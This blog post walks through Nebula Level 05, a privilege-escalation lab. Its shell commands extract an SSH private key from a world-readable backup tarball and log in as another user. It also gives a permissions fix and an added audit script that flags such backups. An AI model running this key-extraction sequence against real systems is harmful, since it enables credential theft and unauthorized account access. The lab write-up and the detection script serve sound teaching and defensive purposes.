blog.ferling.eu by Benedikt Ferling


 

exploit-exercises.com/nebula -- Level 05

Problem

  1. Default permit! A backup that is world-readable.

Exploit

A look into /home/flag05 reveals a backup directory which is world-readable.

ls -lah /home/flag05/

A look into that directory reveals a backup file which is world-readable.

ls -lah /home/flag05/.backup

We can view the contents of the file with:

tar -vztf /home/flag05/.backup/backup-19072011.tgz

This reveals that there is a private key inside that archive. Our aim: extract the key and log in as flag05 with it. Do that by:

tar -Oxzf /home/flag05/.backup/backup-19072011.tgz .ssh/id_rsa > /home/level05/id_rsa
chmod 0600 /home/level05/id_rsa
ssh -i /home/level05/id_rsa flag05@localhost

Logged in as user flag05 we can execute getflag.

Lesson / How to fix

  1. Use restrictive permissions! Protect your backups as well as your data!

chmod 0700 /home/flag05/.backup
chmod 0600 /home/flag05/.backup/backup-19072011.tgz
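
As an added example (not from the original post), a small shell audit for this misconfiguration: it finds gzip-compressed tar archives that other users can read and marks them critical when they contain an SSH private key. The function names, the sample tree and the placeholder key file are constructed for illustration.

```shell
#!/bin/sh
# Added example: audit a tree for world-readable backups that hold SSH keys.

# Print archive members that look like SSH private keys (id_rsa, id_ed25519, ...).
# Public keys (*.pub) do not match because the name must end after id_<type>.
key_members() {
    tar -tzf "$1" 2>/dev/null | grep -E '(^|/)\.ssh/id_[a-z0-9]+$' || true
}

# Report every .tgz / .tar.gz under DIR whose own mode has the o+r bit set.
# Only the file's mode bits are checked, not the permissions of parent dirs.
audit_backups() {
    find "$1" -type f \( -name '*.tgz' -o -name '*.tar.gz' \) -perm -0004 |
    while IFS= read -r archive; do
        keys=$(key_members "$archive" | tr '\n' ' ')
        if [ -n "$keys" ]; then
            printf 'CRITICAL %s world-readable, contains: %s\n' "$archive" "$keys"
        else
            printf 'WARN %s world-readable\n' "$archive"
        fi
    done
}

# Build a constructed sample tree that mirrors the layout in this level.
make_sample() {
    mkdir -p "$1/flag05/.backup" "$1/src/.ssh"
    echo 'CONSTRUCTED-PLACEHOLDER-NOT-A-KEY' > "$1/src/.ssh/id_rsa"
    tar -czf "$1/flag05/.backup/backup-sample.tgz" -C "$1/src" .ssh
    chmod 0755 "$1/flag05/.backup"
    chmod 0644 "$1/flag05/.backup/backup-sample.tgz"
}

# Demo: audit before and after applying the fix from this section.
demo_dir=$(mktemp -d)
make_sample "$demo_dir"
echo "before fix:"; audit_backups "$demo_dir"
chmod 0700 "$demo_dir/flag05/.backup"
chmod 0600 "$demo_dir/flag05/.backup/backup-sample.tgz"
echo "after fix:";  audit_backups "$demo_dir"
rm -rf "$demo_dir"
```

On a real system, run `audit_backups /home` as root so that find can descend into every home directory.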
